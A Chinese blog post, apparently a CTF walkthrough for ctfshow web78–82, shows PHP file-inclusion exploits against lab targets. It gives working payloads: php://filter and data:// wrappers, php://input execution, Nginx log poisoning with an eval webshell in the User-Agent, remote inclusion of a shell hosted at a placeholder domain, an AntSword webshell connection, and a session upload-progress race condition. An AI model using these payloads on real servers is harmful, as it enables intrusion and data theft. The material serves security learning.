



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="不说永远  珍惜现在" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="不说永远  珍惜现在" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="不说永远  珍惜现在" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="CTF,Web,木马上传,日志包含,session条件竞争,文件包含漏洞" />


<link rel="canonical" href="http://example.com/2025/09/05/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">



  <title>
ctfshow文件包含 - ctfshow-web入门wp |
AlgoZZi's Blog = 不说永远  珍惜现在</title>
<meta name="generator" content="Hexo 7.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">ctfshow文件包含
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2025-09-05 18:21:01">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2025-09-05T18:21:01+08:00">2025-09-05</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>20k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>19 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">AlgoZZi's Blog</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="/images/bg/11.jpg"></li>
          <li class="item" data-background-image="/images/bg/9.jpg"></li>
          <li class="item" data-background-image="/images/bg/8.jpg"></li>
          <li class="item" data-background-image="/images/bg/7.jpg"></li>
          <li class="item" data-background-image="/images/bg/4.jpg"></li>
          <li class="item" data-background-image="/images/bg/6.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/ctfshow-web%E5%85%A5%E9%97%A8wp/" itemprop="item" rel="index" title="分类于 ctfshow-web入门wp"><span itemprop="name">ctfshow-web入门wp</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://example.com/2025/09/05/ctfshow%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="AlgoZZi">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="不说永远  珍惜现在">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="web78"><a href="#web78" class="headerlink" title="web78"></a>web78</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>文件包含</strong></p>
<pre><code class="php">?file=php://filter/convert.base64-encode/resource=flag.php
</code></pre>
<img data-src="\images\article_images\image-20250801171241071.png" alt="image-20250801171241071" style="zoom: 25%;" />

<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250801171316898.png" alt="image-20250801171316898" style="zoom: 25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>伪协议</strong></p>
<p><strong>查看目录下文件</strong></p>
<pre><code class="php">?file=data://text/plain,&lt;?php system(&quot;ls&quot;) ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250801172202035.png" alt="image-20250801172202035" style="zoom:33%;" />

<p>&nbsp;</p>
<pre><code class="php">?file=data://text/plain,&lt;?php system(&quot;tac flag.php&quot;) ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250801171557675.png" alt="image-20250801171557675" style="zoom: 25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解三&#x3D;&#x3D;</strong></p>
<p><strong>思路</strong></p>
<p><strong>Nginx 的日志文件 <code>access.log</code> 是一个文本文件，记录了用户请求信息。</strong></p>
<p><strong>如果我们将一段PHP 代码写进日志，再通过 <code>include(&#39;access.log&#39;)</code>，PHP 会执行其中的代码。</strong></p>
<p><strong>我们构造 POST 请求传参，实现 命令执行（RCE）。</strong></p>
<blockquote>
<p><strong>Nginx 默认日志路径</strong></p>
<p><strong>如果服务器使用的是 Nginx，默认的日志路径通常是：</strong></p>
<ul>
<li><p><strong>访问日志（access log）：</strong></p>
<pre><code class="bash">/var/log/nginx/access.log
</code></pre>
</li>
<li><p><strong>错误日志（error log）：</strong></p>
<pre><code class="bash">/var/log/nginx/error.log
</code></pre>
</li>
</ul>
<p><strong>这个路径来源于默认配置文件 <code>/etc/nginx/nginx.conf</code> 中的一段：</strong></p>
<pre><code>access_log  /var/log/nginx/access.log;
error_log   /var/log/nginx/error.log;
</code></pre>
<p>&nbsp;</p>
<p> &nbsp;</p>
<p><strong>Apache 默认日志路径</strong></p>
<p><strong>如果使用的是 Apache（httpd）：</strong></p>
<ul>
<li><p><strong>访问日志：</strong></p>
<pre><code>/var/log/apache2/access.log
</code></pre>
</li>
<li><p><strong>错误日志：</strong></p>
<pre><code>/var/log/apache2/error.log
</code></pre>
</li>
</ul>
<p><strong>或在某些系统中（如 CentOS）：</strong></p>
<pre><code>/var/log/httpd/access_log
/var/log/httpd/error_log
</code></pre>
<p><strong>这些也都由 Apache 的配置文件 <code>/etc/httpd/conf/httpd.conf</code> 或 <code>/etc/apache2/apache2.conf</code> 决定。</strong></p>
</blockquote>
<p><strong>访问日志</strong></p>
<pre><code class="php">?file=../../../../var/log/nginx/access.log
</code></pre>
<img data-src="\images\article_images\image-20250801210238666.png" alt="image-20250801210238666" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>构造 User-Agent 使其被写入 access.log（日志包含目标）</strong></p>
<pre><code class="php">&lt;?php eval($_POST[a]); ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250801210209458.png" alt="image-20250801210209458" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>post请求</strong></p>
<pre><code class="php">a=system(&quot;tac flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250801210122212.png" alt="image-20250801210122212" style="zoom:25%;" />

<p>&nbsp;</p>
<blockquote>
<p><strong>访问页面时，Nginx 会记录以下信息：</strong></p>
<ul>
<li><strong>访问的 URL</strong></li>
<li><strong>IP 地址</strong></li>
<li><strong>请求方法（GET&#x2F;POST）</strong></li>
<li><strong>User-Agent</strong></li>
<li><strong>Referer 等</strong></li>
</ul>
<p><strong>日志格式长这样：</strong></p>
<pre><code class="bash">127.0.0.1 - - [01/Aug/2025:12:34:56 +0800] &quot;GET /index.php HTTP/1.1&quot; 200 123 &quot;-&quot; &quot;&lt;?php eval($_POST[&#39;a&#39;]); ?&gt;&quot;
</code></pre>
<p>这个最后的 <code>&lt;?php eval($_POST[&#39;a&#39;]); ?&gt;&quot;</code> 就是在请求里写的 <code>User-Agent</code>。</p>
</blockquote>
<p>&nbsp;</p>
<hr>
<h1 id="web79"><a href="#web79" class="headerlink" title="web79"></a>web79</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:10:14
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:12:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p><strong>过滤了 <code>php</code></strong></p>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>换成大写 或者 利用短标签替换 <code>php</code></strong></p>
<pre><code class="php">?file=data://text/plain,&lt;?Php system(&quot;tac flag.php&quot;) ?&gt;
?file=data://text/plain,&lt;?= system(&quot;tac flag.php&quot;) ?&gt;


#甚至可以这样
?file=data://text/plain,&lt;?PHP system(&quot;tac flag.php&quot;) ?&gt;
?file=data://text/plain,&lt;?= system(&quot;tac ????????&quot;) ?&gt;
?file=data://text/plain,&lt;?= system(&quot;tac f???.???&quot;) ?&gt;
?file=data://text/plain,&lt;?= system(&quot;tac flag.ph?&quot;) ?&gt;
?file=data://text/plain,&lt;?= system(&quot;tac f*&quot;) ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250801232241216.png" alt="image-20250801232241216" style="zoom: 25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>将 <code>&lt;?php system(&quot;tac flag.php&quot;) ?&gt;</code></strong></p>
<p><strong>进行base64 编码后 <code>PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKSA/Pg==</code></strong></p>
<pre><code class="php">?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKSA/Pg==
</code></pre>
<img data-src="\images\article_images\image-20250802011023891.png" alt="image-20250802011023891" style="zoom:80%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解三&#x3D;&#x3D;</strong></p>
<p><strong>GET</strong></p>
<pre><code>?file=data://text/plain,&lt;?= eval($_POST[a]);?&gt;
</code></pre>
<p><strong>POST</strong></p>
<pre><code>a=system(&quot;tac flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250802002404164.png" alt="image-20250802002404164" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解四&#x3D;&#x3D;</strong></p>
<blockquote>
<p><strong><code>php://input</code> 是一个PHP协议，允许把请求体当做PHP代码文件包含执行。</strong></p>
<p><strong>直接访问 <code>php://input</code>，可以把HTTP请求的请求体当作PHP代码执行。</strong></p>
</blockquote>
<p><strong>这种解法需要在bp操作</strong></p>
<pre><code class="php">?file=Php://input
</code></pre>
<img data-src="\images\article_images\image-20250802003525091.png" alt="image-20250802003525091" style="zoom: 33%;" />

<p>&nbsp;</p>
<pre><code class="php">&lt;?Php system(&#39;tac flag.php&#39;)?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250802010453916.png" alt="image-20250802010453916" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解五&#x3D;&#x3D;</strong></p>
<p><strong>日志包含</strong></p>
<pre><code class="php">?file=../../../../var/log/nginx/access.log

    
#User-Agent
&lt;?= eval($_POST[a]); ?&gt;
    
    
#POST
a=system(&quot;tac flag.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250801212138779.png" alt="image-20250801212138779" style="zoom:80%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web80"><a href="#web80" class="headerlink" title="web80"></a>web80</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p><strong>过滤了 <code>php</code> <code>data</code></strong></p>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>日志包含</strong></p>
<p><strong>这次日志路径为 <code>/var/log/nginx/access.log</code></strong></p>
<p><strong>查看目录</strong></p>
<pre><code class="php">?file=/var/log/nginx/access.log

    
#User-Agent
&lt;?= eval($_POST[a]); ?&gt;
    
    
#POST
a=system(&quot;ls&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250802095400414.png" alt="image-20250802095400414" style="zoom: 20%;" />

<p>&nbsp;</p>
<p><strong>flag文件名变换为 <code>fl0g.php</code></strong></p>
<pre><code class="php">?file=/var/log/nginx/access.log

    
#User-Agent
&lt;?= eval($_POST[a]); ?&gt;
    
    
#POST
a=system(&quot;tac fl0g.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250802095442524.png" alt="image-20250802095442524" style="zoom: 20%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>远程文件 <code>http://your-shell.com/1</code> 是 PHP 脚本，内容如下：</strong></p>
<pre><code class="php">&lt;?php
    eval($_POST[1]);
?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250802101056417.png" alt="image-20250802101056417" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>利用远程文件 <code>http://your-shell.com/1</code> 进行POST</strong></p>
<pre><code class="php">?file=http://your-shell.com/1

#POST
1=system(&quot;ls&quot;);
1=system(&quot;tac fl0g.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250802101442503.png" alt="image-20250802101442503" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解三&#x3D;&#x3D;</strong></p>
<pre><code class="php">?file=Php://input

#请求内容
&lt;?php system(&quot;ls&quot;) ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250802102359566.png" alt="image-20250802102359566" style="zoom:33%;" />

<p>&nbsp;</p>
<pre><code class="php">?file=Php://input

#请求内容
&lt;?php system(&quot;cat fl0g.php&quot;) ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250802102504525.png" alt="image-20250802102504525" style="zoom:33%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web81"><a href="#web81" class="headerlink" title="web81"></a>web81</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p><strong>过滤了 <code>php</code> <code>data</code> <code>:</code></strong></p>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>查看目录</strong></p>
<p><strong>注意<code>&lt;?= file_get_contents(&quot;http://your-shell.com/1&quot;); ?&gt;</code> 需要添加在原 <code>UA</code> 内容空一格后面（这道题服务器端会对 <code>UA</code> 格式进行检查，需要保留原<code>UA</code> 内容）</strong></p>
<pre><code class="php">?file=/var/log/nginx/access.log

    
#User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 &lt;?= eval($_POST[a]); ?&gt;
    
    
#POST
a=system(&quot;ls&quot;);
a=system(&quot;tac fl0g.php&quot;);
</code></pre>
<img data-src="\images\article_images\image-20250802235003792.png" alt="image-20250802235003792" style="zoom: 25%;" />

<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250802235043666.png" alt="image-20250802235043666" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解二&#x3D;&#x3D;</strong></p>
<p><strong>蚁剑连接</strong></p>
<p><strong>蚁剑一句话木马，添加在 <code>UA</code> 后面，传入日志</strong></p>
<pre><code class="php">&lt;?php @eval($_POST[a]); ?&gt;
</code></pre>
<img data-src="\images\article_images\image-20250803001820134.png" alt="image-20250803001820134" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>连接蚁剑，密码为传入的字段</strong></p>
<img data-src="\images\article_images\image-20250803002003634.png" alt="image-20250803002003634" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>使用虚拟终端拿到flag</strong></p>
<img data-src="\images\article_images\image-20250803003532075.png" alt="image-20250803003532075" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>或者直接查看flag文件</strong></p>
<img data-src="\images\article_images\image-20250803003725310.png" alt="image-20250803003725310" style="zoom:33%;" />

<p>&nbsp;</p>
<hr>
<h1 id="web82"><a href="#web82" class="headerlink" title="web82"></a>web82</h1><pre><code class="php">&lt;?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET[&#39;file&#39;]))&#123;
    $file = $_GET[&#39;file&#39;];
    $file = str_replace(&quot;php&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;data&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;:&quot;, &quot;???&quot;, $file);
    $file = str_replace(&quot;.&quot;, &quot;???&quot;, $file);
    include($file);
&#125;else&#123;
    highlight_file(__FILE__);
&#125;
</code></pre>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>思路：利用 PHP 的上传进度功能 <code>session.upload_progress</code> 把恶意代码注入到服务器临时 <code>session</code> 文件中，然后再用 <code>include()</code> 把这个临时文件包含执行。</strong></p>
<p>&nbsp;</p>
<p><strong>知识储备：如果在 <code>cookie</code> 中设置 <code>PHPSESSID</code>（即 <code>session</code> 值）&#x3D; <code>flag</code>，那么会在服务器上创建一个 <code>/tmp/sess_flag</code> 文件；对于默认配置，文件内容上传后会被清除，那么我们需要进行环境竞争，在删除之前，对该文件进行文件包含，从而进行命令执行。</strong></p>
<blockquote>
<p><strong>php中的 <code>session.upload_progress</code> :   <span class="exturl" data-url="aHR0cHM6Ly93d3cucGhwLm5ldC9tYW51YWwvemgvc2Vzc2lvbi51cGxvYWQtcHJvZ3Jlc3MucGhw">PHP: Session 上传进度 - Manual</span></strong></p>
</blockquote>
<p>在 <code>php.ini</code> 有其中以下几个<strong>默认选项</strong></p>
<pre><code class="ini">1. session.upload_progress.enabled = on
2. session.upload_progress.cleanup = on
3. session.upload_progress.prefix = &quot;upload_progress_&quot;
4. session.upload_progress.name = &quot;PHP_SESSION_UPLOAD_PROGRESS&quot;
5. session.use_strict_mode=off
</code></pre>
<p>&nbsp;</p>
<ul>
<li><p><strong><code>session.upload_progress.enabled = On</code></strong></p>
<ul>
<li>📌 <strong>作用：</strong><br>是否启用 <strong>上传进度追踪功能</strong>。</li>
<li>✅ <strong>启用时：</strong><br>当客户端通过表单上传文件，并且表单里含有 <code>PHP_SESSION_UPLOAD_PROGRESS</code> 字段时，<br> PHP 会自动把此次文件上传的详细信息(如上传时间、上传进度等)写入到对应的 <code>session</code> 文件中。</li>
<li>❌ <strong>关闭时：</strong><br>PHP 不会记录上传进度，即使你表单里加了 <code>PHP_SESSION_UPLOAD_PROGRESS</code> 字段，也不会有任何效果。</li>
</ul>
</li>
<li><p><strong><code>session.upload_progress.cleanup = On</code></strong></p>
<ul>
<li><p>📌 <strong>作用：</strong><br>控制 <strong>上传完成后，是否自动删除上传进度信息</strong>。</p>
</li>
<li><p>✅ <strong>On（默认）：</strong><br>上传一完成，PHP 会<strong>自动清除 session 文件中那段上传进度内容</strong>（包括你伪造的 <code>&lt;?php ... ?&gt;</code>）。</p>
<p>也就是说，恶意内容会在上传后很快被删掉，<strong>留给攻击者操作的窗口非常短</strong>。</p>
</li>
<li><p>❌ <strong>Off：</strong></p>
<p>上传完成后，上传进度内容会一直保留在 <code>session</code> 文件中，直到这个 <code>session</code> 超时或被手动清理。</p>
</li>
</ul>
</li>
<li><p><strong><code>session.upload_progress.prefix = &quot;upload_progress_&quot;</code></strong></p>
<ul>
<li><p>📌 <strong>作用：</strong></p>
<p>设置写入 <code>session</code> 文件时的 key 前缀。<br>默认是 <code>&quot;upload_progress_&quot;</code>，所以写入内容的键名是：</p>
<pre><code class="php">upload_progress_&lt;随机值&gt;
</code></pre>
<p>比如你上传时，如果设置了表单字段：</p>
<pre><code class="php">&lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;&lt;?php system(&#39;ls&#39;); ?&gt;&quot; /&gt;
</code></pre>
<p>那最终写入 <code>session</code> 文件的内容可能是：</p>
<pre><code class="php">upload_progress_1234|a:6:&#123;
  &quot;start&quot;:...,
  &quot;content&quot;:&quot;&lt;?php system(&#39;ls&#39;); ?&gt;&quot;,
  ...
&#125;
</code></pre>
</li>
</ul>
</li>
<li><p><strong><code>session.upload_progress.name = &quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</code></strong></p>
<ul>
<li><p>📌 <strong>作用：</strong><br>指定 <strong>表单里用于传递上传进度追踪 ID 的字段名</strong>。<br>默认是：</p>
<pre><code class="html">&lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;...&quot; /&gt;
</code></pre>
<p>这个字段值就是上传 ID，也就是 <code>upload_progress_&lt;这个值&gt;</code>。<br>如果你设置：</p>
<pre><code class="ini">session.upload_progress.name = &quot;PROGRESS_ID&quot;
</code></pre>
<p>那你就必须这样写：</p>
<pre><code class="html">&lt;input type=&quot;hidden&quot; name=&quot;PROGRESS_ID&quot; value=&quot;&lt;?php system(&#39;ls&#39;); ?&gt;&quot; /&gt;
</code></pre>
<p>否则 PHP 就不会追踪这个上传进度了。</p>
</li>
</ul>
</li>
<li><p><strong><code>session.use_strict_mode = Off</code></strong></p>
<ul>
<li><p>📌 <strong>作用：</strong><br>控制 <strong>PHP 在创建 <code>session</code> 时是否检查 <code>session ID</code> 的有效性</strong>。</p>
</li>
<li><p>假设设置如下：</p>
<pre><code class="ini">session.use_strict_mode = Off
</code></pre>
<p>然后你请求网站时伪造了 <code>cookie</code>：</p>
<pre><code class="http">Cookie: PHPSESSID=love
</code></pre>
<p>但服务器上 <code>/tmp/sess_love</code> 文件根本不存在。</p>
<p>✅ 如果 <code>strict_mode</code> 是 <code>Off</code>：</p>
<ul>
<li>PHP 会 <strong>接受你伪造的 <code>session ID</code></strong></li>
<li>并且 <strong>自动创建一个新的 <code>/tmp/sess_love</code> 文件</strong></li>
<li>攻击者就能指定 <code>session</code> 文件的名字，配合题目中的 <code>include()</code>，非常危险！</li>
</ul>
<p>❌ 如果 <code>strict_mode</code> 是 <code>On</code>：</p>
<ul>
<li>PHP 会发现你提交的 <code>session ID</code>（如 <code>love</code>）在服务器上不存在</li>
<li><strong>拒绝使用这个伪造的 <code>session ID</code></strong></li>
<li>会自动给你重新生成一个随机的合法 <code> session ID</code></li>
<li>你无法预测 <code>session</code> 文件名，payload 也没法写进指定的文件</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>&nbsp;</p>
<p><strong>&#x3D;&#x3D;题解一&#x3D;&#x3D;</strong></p>
<p><strong>利用 <code>POST.html</code> 上传任意一个文件</strong></p>
<p><strong>注意在相应位置修改靶机地址和命令</strong></p>
<pre><code class="html">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
&lt;!-- 修改靶机地址 --&gt;
&lt;form action=&quot;http://ca852e6a-5dde-48a7-995d-6e6fc0953fdb.challenge.ctf.show//&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
&lt;!-- 修改命令 --&gt;
&lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;&lt;?php system(&#39;ls&#39;); ?&gt;&quot; /&gt;
&lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;submit&quot; /&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;?php
session_start();
?&gt;
</code></pre>
<p>&nbsp;</p>
<p><strong>抓包后，在 <code>cookie</code> 后添加 <code>PHPSESSID=love</code>（ <code>PHPSESSID</code> 的值任意）</strong></p>
<p><strong>如下示例</strong></p>
<pre><code class="ini">Cookie: ccccooookkkkiiiieee; PHPSESSID=love
</code></pre>
<img data-src="\images\article_images\image-20250804001653557.png" alt="image-20250804001653557" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>将抓到的包发送到 <code>Intruder</code> 爆破模块，注意没有 <code>payload</code> 插入点</strong></p>
<p><strong>设置 <code>Payload type</code> 为 <code>Null payloads</code></strong></p>
<p><strong>勾选 <code>Continue indefinitely</code> 无限重复</strong></p>
<img data-src="\images\article_images\image-20250804002512882.png" alt="image-20250804002512882" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>新建 <code>Resource pool</code> 资源池，设置线程 <code>30</code></strong></p>
<p><strong><code>Start attack</code> 开始爆破，不断上传文件</strong></p>
<img data-src="\images\article_images\image-20250805162000310.png" alt="image-20250805162000310" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>访问 <code>靶机?file=/tmp/sess_love</code> 并抓包</strong></p>
<img data-src="\images\article_images\image-20250804002722557.png" alt="image-20250804002722557" style="zoom:25%;" />

<p>&nbsp;</p>
<p><strong>同上（这里不需要对 <code>cookie</code> 进行修改处理）</strong></p>
<p><strong>将抓到的包发送到 <code>Intruder</code> 爆破模块，注意没有 <code>payload</code> 插入点</strong></p>
<p><strong>设置 <code>Payload type</code> 为 <code>Null payloads</code></strong></p>
<p><strong>勾选 <code>Continue indefinitely</code> 无限重复</strong></p>
<img data-src="\images\article_images\image-20250804002512882.png" alt="image-20250804002512882" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>新建 <code>Resource pool</code> 资源池，设置线程 <code>80</code> (访问包的线程数需要大于上传包的线程数)</strong></p>
<p><strong><code>Start attack</code> 开始爆破，不断访问文件</strong></p>
<img data-src="\images\article_images\image-20250805162212020.png" alt="image-20250805162212020" style="zoom:33%;" />

<p>&nbsp;</p>
<p><strong>查看访问 <code>靶机?file=/tmp/sess_love</code> 的包的爆破结果</strong></p>
<p><strong>根据 <code>Length</code> 长度的不同找到命令的回显</strong></p>
<img data-src="\images\article_images\image-20250804005056379.png" alt="image-20250804005056379" style="zoom:33%;" />

<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250805161317653.png" alt="image-20250805161317653" style="zoom:80%;" />

<p>&nbsp;</p>
<p>&nbsp;</p>
<img data-src="\images\article_images\image-20250804005515129.png" alt="image-20250804005515129" style="zoom: 80%;" />

<p>&nbsp;</p>
